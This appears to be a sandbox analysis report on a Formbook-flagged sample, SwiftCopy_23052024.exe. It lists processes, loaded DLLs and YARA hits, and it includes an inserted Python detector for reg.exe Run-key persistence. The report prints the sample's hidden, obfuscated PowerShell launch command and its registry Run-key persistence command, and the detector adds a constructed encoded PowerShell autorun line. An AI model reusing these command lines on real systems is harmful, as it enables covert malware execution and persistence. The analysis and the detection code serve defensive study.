Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D12ED 18_2_225D12ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225352A0 18_2_225352A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251D34C 18_2_2251D34C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E132D 18_2_225E132D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2257739A 18_2_2257739A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225DF0CC 18_2_225DF0CC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225370C0 18_2_225370C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E70E9 18_2_225E70E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EF0E0 18_2_225EF0E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251F172 18_2_2251F172
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225FB16B 18_2_225FB16B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2256516C 18_2_2256516C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253B1B0 18_2_2253B1B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E16CC 18_2_225E16CC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EF7B0 18_2_225EF7B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22521460 18_2_22521460
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EF43F 18_2_225EF43F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E7571 18_2_225E7571
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225CD5B0 18_2_225CD5B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EFA49 18_2_225EFA49
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E7A46 18_2_225E7A46
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A3A6C 18_2_225A3A6C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225DDAC6 18_2_225DDAC6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225CDAAC 18_2_225CDAAC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22575AA0 18_2_22575AA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EFB76 18_2_225EFB76
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A5BF0 18_2_225A5BF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2256DBF9 18_2_2256DBF9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259D800 18_2_2259D800
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225338E0 18_2_225338E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22539950 18_2_22539950
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254B950 18_2_2254B950
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22539EB0 18_2_22539EB0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EFF09 18_2_225EFF09
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22531F92 18_2_22531F92
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EFFB1 18_2_225EFFB1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EFCF2 18_2_225EFCF2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E1D5A 18_2_225E1D5A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22533D40 18_2_22533D40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: String function: 2259EA12 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: String function: 2251B970 appears 264 times
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: String function: 22565130 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: String function: 225AF290 appears 102 times
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: String function: 22577E54 appears 97 times
Source: SwiftCopy_23052024.exe Static PE information: invalid certificate
Source: SwiftCopy_23052024.exe, 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesemirelief.exeP vs SwiftCopy_23052024.exe
Source: SwiftCopy_23052024.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"
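The reg.exe line above is the persistence stage: a REG_EXPAND_SZ Run value whose first token is an environment variable (it is assumed to hold the PowerShell path; the report does not show its value) and whose argument reads the real script back from the HKCU:\Oplukkelig\ value Bractlets52, so the Run value itself never names powershell.exe or the payload. The following Python is an added example, not part of this report and not code from the sample: it parses REG ADD command lines as a process-creation log pipeline would and scores the indicators the Sigma hits above describe. SAMPLES[0] copies the report's command line; the OneDrive, RunOnce/-enc and Contoso lines are constructed.

```python
"""Score reg.exe Run-key writes for the loader's persistence pattern.

Added example: not part of the sandbox report and not code from the sample.
parse_reg_add() handles the reg.exe argument syntax; assess() fires the
indicators the Sigma hits describe. SAMPLES[0] copies the report's command
line; the other lines are constructed.
"""
import re

RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\b", re.I)
# Data that is a path: a drive letter or an expanded variable followed by '\'.
PATH_LIKE_RE = re.compile(r"^(?:[A-Za-z]:\\|%[^%\s]+%\\)")
# Data whose first token *is* an environment variable: the variable holds the
# interpreter, so the Run value never names powershell.exe directly.
ENV_STUB_CMD_RE = re.compile(r"^%[^%\s]+%\s")
PS_FLAGS_RE = re.compile(
    r"-(?:windowstyle|w)\s+(?:hidden|minimized)|-(?:encodedcommand|enc|ec)\b"
    r"|-nop(?:rofile)?\b|-noni(?:nteractive)?\b",
    re.I,
)
# Script body staged in another registry value and read back at run time.
REG_READBACK_RE = re.compile(r"Get-ItemProperty|\bHK(?:CU|LM):", re.I)


def split_args(cmdline):
    """Whitespace split that keeps "quoted" spans whole (enough for reg.exe)."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_reg_add(cmdline):
    """Return {key, value, type, data, force} for a 'reg add' line, else None."""
    args = split_args(cmdline)
    if len(args) < 3:
        return None
    exe = args[0].lower().rsplit("\\", 1)[-1]
    if exe not in ("reg", "reg.exe") or args[1].lower() != "add":
        return None
    rec = {"key": args[2], "value": None, "type": "REG_SZ", "data": None, "force": False}
    names = {"/v": "value", "/t": "type", "/d": "data"}
    i = 3
    while i < len(args):
        flag = args[i].lower()
        if flag == "/f":
            rec["force"] = True
            i += 1
        elif flag in names and i + 1 < len(args):
            rec[names[flag]] = args[i + 1]
            i += 2
        else:  # /ve, /s, /reg:32 and the like do not matter for this check
            i += 1
    return rec


INDICATORS = {
    "run_key": lambda r: bool(RUN_KEY_RE.search(r["key"])),
    "env_var_as_command": lambda r: (
        r["type"].upper() == "REG_EXPAND_SZ"
        and bool(ENV_STUB_CMD_RE.match(r["data"] or ""))
    ),
    "powershell_flags": lambda r: bool(PS_FLAGS_RE.search(r["data"] or "")),
    "registry_readback": lambda r: bool(REG_READBACK_RE.search(r["data"] or "")),
    "data_not_a_path": lambda r: r["data"] is not None and not PATH_LIKE_RE.match(r["data"]),
}


def assess(cmdline):
    """Parse one command line; None if it is not 'reg add', else the record
    with the fired indicators and a verdict."""
    rec = parse_reg_add(cmdline)
    if rec is None:
        return None
    rec["indicators"] = [name for name, check in INDICATORS.items() if check(rec)]
    # A Run-key write by itself is routine; require two further signs of staging.
    rec["suspicious"] = "run_key" in rec["indicators"] and len(rec["indicators"]) >= 3
    return rec


def scan(cmdlines):
    """(index, indicators) for every suspicious 'reg add' line in cmdlines."""
    out = []
    for i, line in enumerate(cmdlines):
        rec = assess(line)
        if rec and rec["suspicious"]:
            out.append((i, rec["indicators"]))
    return out


SAMPLES = [
    # 0: copied from the report (cmd.exe -> reg.exe)
    r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"''',
    # 1: constructed benign autorun: expanded path, no interpreter flags
    r'reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_EXPAND_SZ /d "%LOCALAPPDATA%\Microsoft\OneDrive\OneDrive.exe /background" /f',
    # 2: constructed encoded-command autorun (hypothetical value name 'upd')
    r'C:\Windows\System32\reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v upd /d "powershell -nop -w hidden -enc SQBFAFgA" /f',
    # 3: constructed write outside any autorun key
    r'reg add HKCU\Software\Contoso\App /v Theme /d dark /f',
]

if __name__ == "__main__":
    for idx, fired in scan(SAMPLES):
        print(f"SAMPLES[{idx}] suspicious: {', '.join(fired)}")
```

The report's line fires all five indicators; the benign OneDrive autorun fires only run_key, because an expanded %VAR%\path is still a path and carries no interpreter flags. Matching on the parsed /d data rather than on the raw command line is what lets the check survive the "Use Short Name Path" and Dosfuscation variants the Sigma rules flag, since those only change how reg.exe is invoked, not the value it writes.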
Source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.evad.winEXE@17/22@2/1
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403248
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_0040450D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_0040450D
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar, 0_2_00402138
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe File created: C:\Users\user\AppData\Roaming\fertiliseringer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4480:120:WilError_03
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe File created: C:\Users\user~1\AppData\Local\Temp\nsz14C1.tmp
Source: SwiftCopy_23052024.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SwiftCopy_23052024.exe ReversingLabs: Detection: 26%
Source: SwiftCopy_23052024.exe Virustotal: Detection: 27%
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe File read: C:\Users\user\Desktop\SwiftCopy_23052024.exe
Source: unknown Process created: C:\Users\user\Desktop\SwiftCopy_23052024.exe "C:\Users\user\Desktop\SwiftCopy_23052024.exe"
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe "C:\Users\user~1\AppData\Local\Temp\Tabsgivende.exe"
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe Process created: C:\Windows\SysWOW64\Magnify.exe "C:\Windows\SysWOW64\Magnify.exe"
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: cryptbase.dll
